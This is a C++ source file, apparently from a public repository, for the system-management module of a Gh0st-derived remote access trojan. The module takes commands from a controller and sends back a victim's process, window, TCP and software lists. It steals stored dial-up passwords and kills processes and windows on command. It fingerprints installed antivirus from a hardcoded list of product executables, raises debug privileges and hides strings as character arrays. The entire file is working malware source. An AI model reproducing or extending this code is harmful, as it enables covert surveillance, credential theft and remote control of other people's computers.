GuanM/Rat-winos4.0-gh0st
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Rat-winos4.0-gh0st/Hero/ZliDll/Sysinfo/SystemManager.cpp
Logkiss a6a4b6368e rat
2024-06-23 17:36:53 +08:00

957 lines
26 KiB
C++
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// SystemManager.cpp: implementation of the CSystemManager class.
//
//////////////////////////////////////////////////////////////////////
#include "StdAfx.h"
#include "SystemManager.h"
#include "Dialupass.h"
#include <tlhelp32.h>
#include <psapi.h>
#include <iphlpapi.h>
#pragma comment(lib,"Iphlpapi.lib")
#pragma comment(lib,"Psapi.lib")
#include "../until.h"
typedef struct
{
BYTE bToken; // = 1
CHAR szCpuSpeend[32]; //cpu速度
CHAR szCpuInfo[128]; //CPU信息
CHAR szPcName[50]; //计算机名称
CHAR szUserName[32]; //用户名
CHAR szScrSize[32]; //屏幕分辨率
CHAR LineName[100]; //上线域名
CHAR LinePort[32]; //上线端口
CHAR Program[256]; //程序途径
CHAR InstallOpen[100]; //程序运行方式
CHAR szUserVirus[256]; //用户杀毒软件
DWORD Memory; //内存容量
}MESSAGEInfo;
//////////////////////////////////////////////////////////////////////
enum
{
COMMAND_MEMOEY=100, //获取CPU内存值命令
COMMAND_STOPED, //发送停止命令
TOKEN_MEMORY //服务端发送过来内存使用值
};
#define SystemBasicInformation 0
#define SystemPerformanceInformation 2
#define SystemTimeInformation 3
#define Li2Double(x) ((double)((x).HighPart) * 4.294967296E9 + (double)((x).LowPart))
typedef struct{
DWORD dwUnknown1;
ULONG uKeMaximumIncrement;
ULONG uPageSize;
ULONG uMmNumberOfPhysicalPages;
ULONG uMmLowestPhysicalPage;
ULONG uMmHighestPhysicalPage;
ULONG uAllocationGranularity;
PVOID pLowestUserAddress;
PVOID pMmHighestUserAddress;
ULONG uKeActiveProcessors;
BYTE bKeNumberProcessors;
BYTE bUnknown2;
WORD wUnknown3;
}SYSTEM_BASIC_INFORMATION;
typedef struct
{
LARGE_INTEGER liIdleTime;
DWORD dwSpare[76];
} SYSTEM_PERFORMANCE_INFORMATION;
typedef struct
{
LARGE_INTEGER liKeBootTime;
LARGE_INTEGER liKeSystemTime;
LARGE_INTEGER liEXPTimeZoneBias;
ULONG uCurrentTimeZoneId;
DWORD dwReserved;
} SYSTEM_TIME_INFORMATION;
typedef LONG (WINAPI *PROCNTQSI)(UINT,PVOID,ULONG,PULONG);
PROCNTQSI NtQuerySystemInformation;
////////////////////////////////////////////////////////////////////////////////////////////
BOOL DebugPrivilege(const char *PName,BOOL bEnable);
CSystemManager::CSystemManager(CClientSocket *pClient,UINT Ports,UCHAR Linetypes,UCHAR Opertypes,CHAR *Addressl) : CManager(pClient)
{
NetPort = Ports; //连接端口
NetLine = Linetypes; //连接方式
NetOpert = Opertypes; //运行类型
Linkaddress = Addressl; //连接地址
StopEvent=CreateEvent(NULL,false,false,NULL);
SendProcessList();
}
CSystemManager::~CSystemManager()
{
// TerminateThread( hSendMemoryThread, 0);
// CloseHandle(hSendMemoryThread);
}
void CSystemManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
SwitchInputDesktop();
switch (lpBuffer[0])
{
case COMMAND_SYSTEMINFO:
GetSystemInfo();
break;
case COMMAND_PSLIST:
SendProcessList();
break;
case COMMAND_WSLIST:
SendWindowsList();
break;
case COMMAND_DIALUPASS: // 拨号密码
SendDialupassList();
break;
case COMMAND_TSLIST:
SendTcpList();
break;
case COMMAND_KILLPROCESS: //关闭进程
KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
break;
case COMMAND_WINDOW_CLOSE: //向窗口发送关闭消息
CloseWindow(lpBuffer+1);
break;
case COMMAND_WINDOW_TEST: //最大化最小化 隐藏窗口
TestWindow(lpBuffer+1);
break;
case COMMAND_MEMOEY: //获取CPU内存使用情况
hSendMemoryThread= MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SendCPUAndMemoryThread, (LPVOID)this, 0, NULL);
break;
case COMMAND_STOPED:
SetEvent(StopEvent);
break;
case COMMAND_rjLIST:
SendSoftList();
break;
default:
break;
}
}
void CSystemManager::SendProcessList()
{
UINT nRet = -1;
LPBYTE lpBuffer = getProcessList();
if (lpBuffer == NULL)
return;
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
void CSystemManager::SendWindowsList()
{
UINT nRet = -1;
LPBYTE lpBuffer = getWindowsList();
if (lpBuffer == NULL)
return;
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
void CSystemManager::SendDialupassList()
{
CDialupass pass;
int nPacketLen = 0;
int i;
for (i = 0; i < pass.GetMax(); i++)
{
COneInfo *pOneInfo = pass.GetOneInfo(i);
for (int j = 0; j < STR_MAX; j++)
nPacketLen += lstrlen(pOneInfo->Get(j)) + 1;
}
nPacketLen += 1;
LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, nPacketLen);
DWORD dwOffset = 1;
for (i = 0; i < pass.GetMax(); i++)
{
COneInfo *pOneInfo = pass.GetOneInfo(i);
for (int j = 0; j < STR_MAX; j++)
{
int nFieldLength = lstrlen(pOneInfo->Get(j)) + 1;
memcpy(lpBuffer + dwOffset, pOneInfo->Get(j), nFieldLength);
dwOffset += nFieldLength;
}
}
lpBuffer[0] = TOKEN_DIALUPASS;
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
void CSystemManager::KillProcess(LPBYTE lpBuffer, UINT nSize) //关闭程序
{
HANDLE hProcess = NULL;
for (unsigned int i = 0; i < nSize; i += 4)
{
DWORD Ipsid = *(LPDWORD)(lpBuffer + i);
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_ALL_ACCESS,FALSE,Ipsid);
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
}
// 稍稍Sleep下防止出错
Sleep(200);
// 刷新进程列表
SendProcessList();
// 刷新窗口列表
// SendWindowsList();
}
LPBYTE CSystemManager::getProcessList()
{
HANDLE hSnapshot = NULL;
HANDLE hProcess = NULL;
HMODULE hModules = NULL;
PROCESSENTRY32 pe32 = {0};
DWORD cbNeeded;
char strProcessName[MAX_PATH] = {0};
LPBYTE lpBuffer = NULL;
DWORD dwOffset = 0;
DWORD dwLength = 0;
DebugPrivilege(SE_DEBUG_NAME, TRUE); //提取权限
//创建系统快照
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hSnapshot == INVALID_HANDLE_VALUE)
return NULL;
pe32.dwSize = sizeof(PROCESSENTRY32);
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024); //暂时分配一下缓冲区
lpBuffer[0] = TOKEN_PSLIST;
dwOffset = 1;
if(Process32First(hSnapshot, &pe32)) //得到第一个进程顺便判断一下系统快照是否成功
{
do
{
//打开进程并返回句柄
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID);
if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
{
//枚举第一个模块句柄也就是自身
EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
//得到自身的完整名称
GetModuleFileNameEx(hProcess, hModules, strProcessName, sizeof(strProcessName));
//开始计算占用的缓冲区, 我们关心他的发送的数据结构
// 此进程占用数据大小
dwLength = sizeof(DWORD) + lstrlen(pe32.szExeFile) + lstrlen(strProcessName) + 2;
// 缓冲区太小,再重新分配下
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
//数据结构是 进程ID+进程名+0+进程完整名+0
memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
dwOffset += sizeof(DWORD);
memcpy(lpBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1);
dwOffset += lstrlen(pe32.szExeFile) + 1;
memcpy(lpBuffer + dwOffset, strProcessName, lstrlen(strProcessName) + 1);
dwOffset += lstrlen(strProcessName) + 1;
}
CloseHandle(hProcess);//新修改
}
while(Process32Next(hSnapshot, &pe32)); //继续得到下一个快照
}
//用lpbuffer获得整个缓冲去
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
DebugPrivilege(SE_DEBUG_NAME, FALSE); //还原提权
CloseHandle(hSnapshot); //释放句柄
return lpBuffer; //数据返回
}
BOOL DebugPrivilege(const char *PName,BOOL bEnable)
{
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
bResult = FALSE;
return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
if (GetLastError() != ERROR_SUCCESS)
{
bResult = FALSE;
}
CloseHandle(hToken);
return bResult;
}
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
DWORD dwLength = 0;
DWORD dwOffset = 0;
DWORD dwProcessID = 0;
LPBYTE lpBuffer = *(LPBYTE *)lParam;
char strTitle[1024];
try
{
GetWindowText(hwnd, strTitle, sizeof(strTitle)-1);
strTitle[sizeof(strTitle)-1]=0;
if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
return true;
if (lpBuffer == NULL)
{
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
dwOffset=1;
}else
{
dwOffset = LocalSize(lpBuffer);
while(*(lpBuffer + dwOffset - 2)==0) dwOffset--;
}
dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
}catch (...)
{
return true;
}
GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);
*(LPBYTE *)lParam = lpBuffer;
return true;
}
/*
memset(strTitle, 0, sizeof(strTitle));
//得到系统传递进来的窗口句柄的窗口标题
GetWindowText(hwnd, strTitle, sizeof(strTitle));
//这里判断 窗口是否可见 或标题为空
if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
return true;
//同进程管理一样我们注意他的发送到主控端的数据结构
if (lpBuffer == NULL)
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1); //暂时分配缓冲区
dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
dwOffset = LocalSize(lpBuffer);
//重新计算缓冲区大小
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
//下面两个memcpy就能看到数据结构为 hwnd+窗口标题+0
memcpy((lpBuffer+dwOffset),&hwnd,sizeof(DWORD));
memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);
*(LPBYTE *)lParam = lpBuffer;
return true;
}
*/
LPBYTE CSystemManager::getWindowsList()
{
LPBYTE lpBuffer = NULL;
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
lpBuffer[0] = TOKEN_WSLIST;
return lpBuffer;
}
//获取内存使用情况
void SendCPUAndMemoryInfo(DWORD d,LPVOID lparam)
{
CSystemManager *pThis = (CSystemManager *)lparam;
char buf[12];
ZeroMemory(buf,12);
buf[0]=TOKEN_MEMORY;
MEMORYSTATUS mem;
::GlobalMemoryStatus(&mem);
memcpy(buf+1,(void*)&mem.dwAvailPhys,sizeof(DWORD)); //内存
memcpy(buf+1+sizeof(DWORD),(void*)&d,sizeof(DWORD));
pThis->Send((unsigned char *)buf,12);
}
DWORD WINAPI CSystemManager::SendCPUAndMemoryThread(LPVOID lparam)
{
CSystemManager *pThis = (CSystemManager *)lparam;
// Sleep(3000);
SYSTEM_PERFORMANCE_INFORMATION SysPerfInfo;
SYSTEM_TIME_INFORMATION SysTimeInfo;
SYSTEM_BASIC_INFORMATION SysBaseInfo;
double dbIdleTime;
double dbSystemTime;
LONG status;
LARGE_INTEGER liOldIdleTime = {0,0};
LARGE_INTEGER liOldSystemTime = {0,0};
NtQuerySystemInformation = (PROCNTQSI)GetProcAddress(GetModuleHandle("ntdll"),"NtQuerySystemInformation");
if (!NtQuerySystemInformation)
return 0;
// get number of processors in the system
status = NtQuerySystemInformation(SystemBasicInformation,&SysBaseInfo,sizeof(SysBaseInfo),NULL);
if (status != NO_ERROR)
return 0;
//printf(" CPU Usage (press any key to exit): ");
BYTE count=0;
while(1)
{
// get new system time
status = NtQuerySystemInformation(SystemTimeInformation,&SysTimeInfo,sizeof(SysTimeInfo),0);
if (status!=NO_ERROR)
return 0;
// get new CPU's idle time
status = NtQuerySystemInformation(SystemPerformanceInformation,&SysPerfInfo,sizeof(SysPerfInfo),NULL);
if (status != NO_ERROR)
return 0;
// if it's a first call - skip it
if (liOldIdleTime.QuadPart != 0)
{
// CurrentValue = NewValue - OldValue
dbIdleTime = Li2Double(SysPerfInfo.liIdleTime) - Li2Double(liOldIdleTime);
dbSystemTime = Li2Double(SysTimeInfo.liKeSystemTime) -Li2Double(liOldSystemTime);
// CurrentCpuIdle = IdleTime / SystemTime
dbIdleTime = dbIdleTime / dbSystemTime;
// CurrentCpuUsage% = 100 - (CurrentCpuIdle * 100) / NumberOfProcessors
dbIdleTime = 100.0 - dbIdleTime * 100.0 /(double)SysBaseInfo.bKeNumberProcessors + 0.5;
SendCPUAndMemoryInfo((unsigned long)dbIdleTime,lparam);
}
// store new CPU's idle and system time
liOldIdleTime = SysPerfInfo.liIdleTime;
liOldSystemTime = SysTimeInfo.liKeSystemTime;
if (WaitForSingleObject(pThis->StopEvent,3000)==WAIT_OBJECT_0)
{
break;
}
}
pThis->m_pClient->Disconnect();
return true;
}
///////////////////////////////////////////杀毒显示////////////////////////////////////
typedef struct
{
char *Course;
char *Name;
}ANTIVIRUS;
ANTIVIRUS g_AntiVirus_Data[20] =
{
{"360tray.exe", "360安全卫士"},
{"360sd.exe", "360杀毒"},
{"avp.exe", "卡巴斯基"},
{"KvMonXP.exe", "江民杀毒"},
{"RavMonD.exe", "瑞星杀毒"},
{"Mcshield.exe", "麦咖啡"},
{"egui.exe", "NOD32"},
{"kxetray.exe", "金山毒霸"},
{"knsdtray.exe", "可牛杀毒"},
{"TMBMSRV.exe", "趋势杀毒"},
{"avcenter.exe", "Avira(小红伞)"},
{"ashDisp.exe", "Avast网络安全"},
{"rtvscan.exe", "诺顿杀毒"},
{"ksafe.exe", "金山卫士"},
{"QQPCRTP.exe", "QQ电脑管家"},
{" ", " "}
};
char* GetViru()
{
static char AllName[1024];
int t=0;
memset(AllName, 0, sizeof(AllName));
while(1)
{
if (strstr(g_AntiVirus_Data[t].Course, " " ) == 0 )
{
if (GetProcessID(g_AntiVirus_Data[t].Course))
{
lstrcat( AllName, g_AntiVirus_Data[t].Name);
lstrcat( AllName, " " );
}
}
else
break;
t++;
}
if (strstr(AllName, " " ) == 0 )
{
lstrcat(AllName , "未发现 ");
}
return AllName;
}
//=========================================================
BOOL GetTokenByName(HANDLE &hToken,LPSTR lpName)
{
if(!lpName)
{
return FALSE;
}
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do
{
_strupr(pe32.szExeFile);
if(!strcmp(pe32.szExeFile,lpName))
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pe32.th32ProcessID);
bRet = OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken);
CloseHandle (hProcessSnap);
return (bRet);
}
}
while (Process32Next(hProcessSnap, &pe32));
bRet = TRUE;
}
else
bRet = FALSE;
CloseHandle (hProcessSnap);
return (bRet);
}
//=================获得当前登陆用户名及计算机名称====================
BOOL GetCurrentUserName(char szUser[],char szDomain[])
{
HANDLE hToken;
//得到shell的token
if(!GetTokenByName(hToken,"EXPLORER.EXE"))
{
return FALSE;
}
DWORD cbti = 0;
PTOKEN_USER ptiUser = NULL;
SID_NAME_USE snu;
//取得所需空间大小
if (GetTokenInformation(hToken, TokenUser, NULL, 0, &cbti))
{
CloseHandle(hToken);
return FALSE;
}
//分配空间
ptiUser = (PTOKEN_USER) HeapAlloc(GetProcessHeap(), 0, cbti);
if(!ptiUser)
{
CloseHandle(hToken);
return FALSE;
}
//取得token信息
if (!GetTokenInformation(hToken, TokenUser, ptiUser, cbti, &cbti))
{
CloseHandle(hToken);
HeapFree(GetProcessHeap(), 0, ptiUser);
return FALSE;
}
DWORD nUser = 50;
DWORD nDomain = 50;
//根据用户的sid得到用户名和domain
if (!LookupAccountSid(NULL, ptiUser->User.Sid, szUser, &nUser, szDomain, &nDomain, &snu))
{
CloseHandle(hToken);
HeapFree(GetProcessHeap(), 0, ptiUser);
return FALSE;
}
CloseHandle(hToken);
HeapFree(GetProcessHeap(), 0, ptiUser);
return TRUE;
}
void GetCurrentUserNamet(char szUser[])
{
char TszUser[50]={0};
char TszDomain[50]={0};
if(GetCurrentUserName(TszUser,TszDomain))
{
wsprintf(szUser,"%s",TszUser);
}
else
{
wsprintf(szUser,"%s","无用户登陆状态!");
}
}
void CSystemManager::NetSystem(UINT Port)
{
NetPort = Port; //连接端口
}
extern char* MyDecode(char *str);
void CSystemManager::GetSystemInfo()
{
MESSAGEInfo Infomsg;
//获取操作系统相关信息
Infomsg.bToken = TOKEN_SYSTEMINFO;
//////////////CPU Speed/////////////////
DWORD dwCpu, dwBufLen;
HKEY hKey;
char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'};
RegOpenKeyEx( HKEY_LOCAL_MACHINE,
JYvni02,
0, KEY_QUERY_VALUE, &hKey );
dwBufLen = sizeof(DWORD);
RegQueryValueEx( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen);
RegCloseKey(hKey);
wsprintf(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu);
//Get CPU Info===============================
CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'};
hKey = NULL;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
{
DWORD dwType;
DWORD dwSize = 128 * sizeof(TCHAR);
char ValueSz[MAX_PATH]={0};
if(RegQueryValueEx(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)ValueSz,&dwSize) == ERROR_SUCCESS)
strcpy(Infomsg.szCpuInfo,DelSpace(ValueSz));
RegCloseKey(hKey);
}
//Get Computer & User Name========================
DWORD dwLen = sizeof(Infomsg.szPcName);
GetComputerNameA(Infomsg.szPcName, &dwLen);
//获取当前用户名及计算机名称
GetCurrentUserNamet(Infomsg.szUserName);
//Get Screen Size=================================
//////////////////////////////////////////////////
wsprintf(Infomsg.szScrSize, ("%d * %d"), GetSystemMetrics(SM_CXSCREEN),GetSystemMetrics(SM_CYSCREEN));
// if(NetLine==0)
// wsprintf(Infomsg.LineName,"域名IP上线%s",Linkaddress); //域名上线写入
// if(NetLine==1)
// wsprintf(Infomsg.LineName,"QQ空间上线%s",Linkaddress); //QQ上线写入
// if(NetLine==2)
// wsprintf(Infomsg.LineName,"网盘上线:%s",Linkaddress); //网盘上线写入
char *lpszHost = NULL;
DWORD dwPort = 80;
lpszHost = Linkaddress;
dwPort = NetPort;
char Linkaddress[MAX_PATH]={0};
char strTMPTime[MAX_PATH]={0};
char strTMPHostB[MAX_PATH]={0};
// wsprintf(strTMPHostA, "%s","域名上线");
wsprintf(Infomsg.LineName,"域名IP上线%s",lpszHost); //域名上线写入
wsprintf(Infomsg.LinePort,"%d",NetPort); //上线端口写入
char szbuf[256];
GetModuleFileName(NULL,szbuf,MAX_PATH); //用于获取程序本身路径
wsprintf(Infomsg.Program,"%s",szbuf );
if(NetOpert==0) //绿色一次性运行
{
wsprintf(Infomsg.InstallOpen,"%s","(绿色运行模式)--重启不上线!"); //上线运行方式
}
else if(NetOpert==1) // 服务启动运行
{
wsprintf(Infomsg.InstallOpen,"%s","(服务启动模式)--SYSTEM用户运行!"); //上线运行方式
}
else if(NetOpert==2) // 直接启动运行
{
wsprintf(Infomsg.InstallOpen,"%s","(Run启动模式)--当前用户运行!"); //上线运行方式
}
wsprintf(Infomsg.szUserVirus,"%s",GetViru()); //杀毒软件
//内存大小
MEMORYSTATUSEX MemInfo; //用GlobalMemoryStatusEx可显示2G以上内存
MemInfo.dwLength=sizeof(MemInfo);
GlobalMemoryStatusEx(&MemInfo);
Infomsg.Memory = (unsigned long)MemInfo.ullTotalPhys/1024/1024;
Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo));
}
void CSystemManager::CloseWindow(LPBYTE buf)
{
DWORD hwnd;
memcpy(&hwnd,buf,sizeof(DWORD)); //得到窗口句柄
::PostMessage((HWND__ *)hwnd,WM_CLOSE,0,0); //向窗口发送关闭消息
Sleep(200);
SendWindowsList(); //窗口显示刷新
}
void CSystemManager::TestWindow(LPBYTE buf)
{
DWORD hwnd;
DWORD dHow;
memcpy((void*)&hwnd,buf,sizeof(DWORD)); //得到窗口句柄
memcpy(&dHow,buf+sizeof(DWORD),sizeof(DWORD)); //得到窗口处理参数
ShowWindow((HWND__ *)hwnd,dHow);
}
bool CSystemManager::DebugPrivilege(const char *PName,BOOL bEnable)
{
typedef BOOL (WINAPI *GetLastErrorT)
(
VOID
);
char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'};
GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW);
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
bResult = FALSE;
return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
LookupPrivilegeValueA(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
if (pGetLastError() != ERROR_SUCCESS)
{
bResult = FALSE;
}
CloseHandle(hToken);
return bResult;
}
void CSystemManager::SendTcpList()
{
UINT nRet = -1;
LPBYTE lpBuffer = getTcpList();
if (lpBuffer == NULL)
return;
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
//TCP 端口状态.
static char TcpState[][32] =
{
"???",
"CLOSED",
"LISTEN",
"SYN_SENT",
"SYN_RCVD",
"ESTABLISHED",
"FIN_WAIT1",
"FIN_WAIT2",
"ITMED_WAIT",
"CLOSING",
"LAST_ACK",
"TIME_WAIT",
"DELETE_TCB"
};
// 生成IP地址字符串.
PCHAR GetIP(unsigned int ipaddr)
{
static char pIP[20];
unsigned int nipaddr = htonl(ipaddr);
wsprintf(pIP, "%d.%d.%d.%d",
(nipaddr >>24) &0xFF,
(nipaddr>>16) &0xFF,
(nipaddr>>8) &0xFF,
(nipaddr)&0xFF);
return pIP;
}
LPBYTE CSystemManager::getTcpList()
{
LPBYTE lpBuffer = NULL;
DWORD dwOffset = 0;
DWORD dwLength = 0;
char cLocalAddr[MAX_PATH] = {0};
char cLocalPort[MAX_PATH] = {0};
char cRemoteAddr[MAX_PATH] = {0};
char cRemotePort[MAX_PATH] = {0};
char cState[MAX_PATH] = {0};
DWORD dwState;
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 10240);
lpBuffer[0] = TOKEN_TSLIST;
dwOffset = 1;
DWORD dwSize = 10240;
BYTE pData[10240]; // 定义数据缓冲区且缓冲区大小为10240字节
MIB_TCPTABLE *pTCPTable = (MIB_TCPTABLE*)pData;
memset(pData,0,dwSize);
// 获取TCP列表信息
GetTcpTable(pTCPTable,&dwSize,TRUE);
// 读取TCP列表数据
for (DWORD i = 0; i < pTCPTable->dwNumEntries; i++)
{
wsprintf(cLocalAddr, "%s",GetIP(pTCPTable->table[i].dwLocalAddr)); // 本地IP地址
wsprintf(cLocalPort, "%d",htons((WORD)pTCPTable->table[i].dwLocalPort)); // 本地端口
wsprintf(cRemoteAddr, "%s",GetIP(pTCPTable->table[i].dwRemoteAddr)); // 远程IP地址
wsprintf(cRemotePort, "%d",htons((WORD)pTCPTable->table[i].dwRemotePort)); // 远程端口
dwState = pTCPTable->table[i].dwState; // 连接状态
if (dwState < 13)
{
wsprintf(cState,"%s",TcpState[dwState]);
}
dwLength = lstrlen(cLocalAddr) + lstrlen(cLocalPort) + lstrlen(cRemoteAddr) + lstrlen(cRemotePort)+ lstrlen(cState) + 5;
// 缓冲区太小,再重新分配下
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
memcpy(lpBuffer + dwOffset, cLocalAddr, lstrlen(cLocalAddr) + 1);
dwOffset += lstrlen(cLocalAddr) + 1;
memcpy(lpBuffer + dwOffset, cLocalPort, lstrlen(cLocalPort) + 1);
dwOffset += lstrlen(cLocalPort) + 1;
memcpy(lpBuffer + dwOffset, cRemoteAddr, lstrlen(cRemoteAddr) + 1);
dwOffset += lstrlen(cRemoteAddr) + 1;
memcpy(lpBuffer + dwOffset, cRemotePort, lstrlen(cRemotePort) + 1);
dwOffset += lstrlen(cRemotePort) + 1;
memcpy(lpBuffer + dwOffset, cState, lstrlen(cState) + 1);
dwOffset += lstrlen(cState) + 1;
}
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
return lpBuffer;
}
void CSystemManager::SendSoftList()
{
UINT nRet = -1;
LPBYTE lpBuffer = getSoftList();
if (lpBuffer == NULL)
return;
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
LPBYTE CSystemManager::getSoftList()
{
LPBYTE lpBuffer = NULL;
DWORD dwOffset = 0;
DWORD dwLength = 0;
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);
lpBuffer[0] = TOKEN_rjLIST;
dwOffset = 1;
char szSubKey[MAX_PATH] = ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall");
HKEY hKey,hSubKey;
LONG lRetVal,lRetVal2;
DWORD nIndex = 0;
DWORD nNameLen = MAX_PATH; // 程序名长度
DWORD nDisplayLen = MAX_PATH; // 显示长度
DWORD nUninstallLen = MAX_PATH;
char szName[MAX_PATH],szDispayName[MAX_PATH],szUninstall[MAX_PATH];
lRetVal = RegOpenKeyEx(HKEY_LOCAL_MACHINE,szSubKey,0,KEY_ALL_ACCESS,&hKey); // 获取注册表信息
DWORD nAttribute = REG_BINARY|REG_DWORD|REG_SZ|REG_EXPAND_SZ|REG_MULTI_SZ|REG_NONE; // 设置属性
// 开始枚举
if (ERROR_SUCCESS == lRetVal)
{
lRetVal = RegEnumKeyEx(hKey,nIndex,szName,&nNameLen,0,NULL,NULL,0);
while(lRetVal != ERROR_NO_MORE_ITEMS)
{
nIndex++;
if (lstrcmpi(szName,"") == 0)
continue;
wsprintf(szUninstall,"%s\\%s",szSubKey,szName); // 得到全名
memset(szDispayName,0,MAX_PATH);
nDisplayLen = MAX_PATH;
lRetVal2 = RegOpenKeyEx(HKEY_LOCAL_MACHINE,szUninstall,0,KEY_ALL_ACCESS,&hSubKey); // 查找
if (lRetVal2 == ERROR_SUCCESS)
{
RegQueryValueEx(hSubKey,"DisplayName",0,&nAttribute,(LPBYTE)szDispayName,&nDisplayLen);
if (lstrcmpi(szDispayName,"") != 0)
{
dwLength = lstrlen(szDispayName) + 1;
// 缓冲区太小,再重新分配下
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
memcpy(lpBuffer + dwOffset, szDispayName, dwLength - 1);
dwOffset += lstrlen(szDispayName) + 1;//添加文件名到列表
}
}
nNameLen = MAX_PATH;
memset(szName,0,MAX_PATH);
lRetVal = RegEnumKeyEx(hKey,nIndex,szName,&nNameLen,0,NULL,NULL,0);
}
}
RegCloseKey(hKey);
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
return lpBuffer;
}
